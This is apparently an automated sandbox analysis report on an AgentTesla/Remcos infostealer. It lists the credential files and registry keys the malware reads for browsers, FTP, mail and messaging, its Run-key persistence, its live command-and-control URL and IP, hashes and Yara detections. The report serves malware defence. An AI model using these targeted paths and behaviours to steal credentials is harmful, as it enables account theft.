Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	File opened: C:\FTP Navigator\Ftplist.txt			Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk			Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: ZOYGRL1ePa.exe, type: SAMPLE
Source: Yara match	File source: 0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.ZOYGRL1ePa.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.CTF Loader.exe.274007c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZOYGRL1ePa.exe.3053af8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4113755597.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113829558.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZOYGRL1ePa.exe PID: 6972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CTF Loader.exe PID: 2756, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	2 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Obfuscated Files or Information	2 Credentials in Registry	111 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	1 Credentials In Files	2 Process Discovery	Distributed Component Object Model	1 Email Collection	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	21 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	1 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ZOYGRL1ePa.exe	84%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
ZOYGRL1ePa.exe	71%	Virustotal		Browse
ZOYGRL1ePa.exe	100%	Avira	TR/Spy.Agent.lkofd
ZOYGRL1ePa.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	100%	Avira	TR/Spy.Agent.lkofd
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	84%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos

Source	Detection	Scanner	Label
http://eygds.info/api.php	0%	Avira URL Cloud	safe
https://xa8WoMjimcU1L20qza.org	0%	Avira URL Cloud	safe
http://eygds.info	0%	Avira URL Cloud	safe
https://xa8WoMjimcU1L20qza.orgt-	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
eygds.info	156.67.74.96	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://eygds.info/api.php	true	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://xa8WoMjimcU1L20qza.org	CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://eygds.info	ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F6D000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003134000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003119000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.000000000268D000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002814000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.000000000263C000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002618000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000026F0000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css	ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003119000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002600000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000027EB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://DynDns.com	ZOYGRL1ePa.exe, CTF Loader.exe.0.dr	false		high
http://checkip.dyndns.org	CTF Loader.exe, 00000005.00000002.2116291831.0000000003112000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000005.00000002.2116291831.000000000310A000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000005.00000002.2116291831.00000000030FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	CTF Loader.exe, 00000005.00000002.2116291831.0000000003112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/E	ZOYGRL1ePa.exe, CTF Loader.exe.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000005.00000002.2116291831.00000000030FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://Paltalk.com	ZOYGRL1ePa.exe, CTF Loader.exe.0.dr	false		high
http://no-ip.com	ZOYGRL1ePa.exe, CTF Loader.exe.0.dr	false		high
https://xa8WoMjimcU1L20qza.orgt-	ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
158.101.44.242	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false
156.67.74.96	eygds.info	United States		201341	TESONETLT	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582107
Start date and time:	2024-12-30 01:56:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	ZOYGRL1ePa.exe renamed because original name is a hash value
Original Sample Name:	5EAF2ADBF1AEABB924D54C7AEAFA40FB.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@3/3@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 147 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:57:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe
00:57:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe
19:57:09	API Interceptor	6090763x Sleep call for process: ZOYGRL1ePa.exe modified
19:57:39	API Interceptor	5221521x Sleep call for process: CTF Loader.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
158.101.44.242	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TESONETLT	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	89.35.126.143
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	156.67.75.129
	Genesis RMS Private Limited November 2024 pdf.exe	Get hash	malicious	FormBook	Browse	156.67.73.254
	http://alnassers.net	Get hash	malicious	Unknown	Browse	156.67.75.210
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	185.164.39.193
	https://files.constantcontact.com/2d77228b901/702368a5-3f96-4cb6-b61d-aab8728be1ff.pdf	Get hash	malicious	Unknown	Browse	156.67.73.1
	Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Get hash	malicious	FormBook	Browse	185.148.106.70
	Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Get hash	malicious	FormBook	Browse	185.148.106.70
	INVOICE - MV CNC BANGKOK - ST24PJ-278.exe	Get hash	malicious	FormBook	Browse	156.67.74.121
	Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe	Get hash	malicious	FormBook	Browse	185.148.106.71
ORACLE-BMC-31898US	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	armv4l.elf	Get hash	malicious	Mirai	Browse	129.148.142.134
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	splm68k.elf	Get hash	malicious	Unknown	Browse	129.147.168.111
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0

Process:	C:\Users\user\Desktop\ZOYGRL1ePa.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	187392
Entropy (8bit):	5.527377632371692
Encrypted:	false
SSDEEP:	3072:pEcUnKOrYUkQ1gkH+wWtaiIGlIQZboLRh9ua/aHyvZRLd2idm:pEXKOYUhz7JGlVbA
MD5:	5EAF2ADBF1AEABB924D54C7AEAFA40FB
SHA1:	5B54FED08222C7AEED799DA6711C307AB3A94EA6
SHA-256:	54A813D8F2AAB7D1E76D8577784CCD9350C025E52F656FEE6A228D39DFBAC926
SHA-512:	CE23E9C3777D99656380FE0030EF82848DCAF607559F8EF1AEA0231658438720B601810134F5EFC432CFF0D53E8C030F7DCE89A127606281EA6B8AB8E8732E23
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.ag................................. ........@.. .......................@............@.................................P...K............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......d................k...y...........................................0...........r...p.rk..p.r...p... ......r...p..(......o......(.....o.......(...........s...........[o......s.........o...........o........s...........s.........i...............io........o.......o.....(.........o..........+......2%(......(........v.(.......2%(......(..........v.(.......2%(......(...........s.........s.........s.........s............2%(......(.........0..!.......~....o....*...2%(...

C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\ZOYGRL1ePa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\ScreenShot\screen.jpeg

Download File

Process:	C:\Users\user\Desktop\ZOYGRL1ePa.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	modified
Size (bytes):	67648
Entropy (8bit):	7.700232475288357
Encrypted:	false
SSDEEP:	768:bnITOSxihA98dtrgFEmSgb+FsjvG0Tm7jnOah9W/SgzBn9vzAUoiGmWzXCxi5Gwk:b8shzgxSgK2sjO9bcuZmXCxi5G/kyXX
MD5:	F16861902DF17E152A6BA0144D2C68B5
SHA1:	9DFAE6AE13541790878AEFE3FC3A89534C0FF4BE
SHA-256:	7FC4F14F28ABB9E3C0956878EDA63F0C7C159BF5A0F63AA07A2D26EA21F0CA16
SHA-512:	DF8445F3194AC8299E789FA506F6B59556294E46C54450E987DF746329E537DF41F66AC9373A40218BBA25E6EED1D5D5410D96E3C0D7DF94518CCF4709DA965F
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C................(.....1#%.(:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc...C......./../cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...ZJ.....;i$@....1...%...}.....R+..iN["...-.t.=.....{...,......E..^e:Ia......H..5.j..2i..(.AE.P.Ek..+.( ...2.....k...?....u.J...(.....^........0.....F}kJX.U.T......W....Q[...Q@.E-lhzm..R..e..i.EJ..y..N..bcQ]g.#.?.......Q.........Z...O.:...._.......Q%kM....NI.........h.W..V..HJ)h.LD..(............!;....WO......>.....kc.&.{y..g.C/..F..nn._....'Eu...._...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.527377632371692
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	ZOYGRL1ePa.exe
File size:	187'392 bytes
MD5:	5eaf2adbf1aeabb924d54c7aeafa40fb
SHA1:	5b54fed08222c7aeed799da6711c307ab3a94ea6
SHA256:	54a813d8f2aab7d1e76d8577784ccd9350c025e52f656fee6a228d39dfbac926
SHA512:	ce23e9c3777d99656380fe0030ef82848dcaf607559f8ef1aea0231658438720b601810134f5efc432cff0d53e8c030f7dce89a127606281ea6b8ab8e8732e23
SSDEEP:	3072:pEcUnKOrYUkQ1gkH+wWtaiIGlIQZboLRh9ua/aHyvZRLd2idm:pEXKOYUhz7JGlVbA
TLSH:	1304274973F91944F5BF6B7204B14C4B23B0A4531923E71E8FD544AA2A337908E5AFBB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.ag................................. ........@.. .......................@............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x42f19e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6761CB3E [Tue Dec 17 19:04:30 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f150	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x30000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x32000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
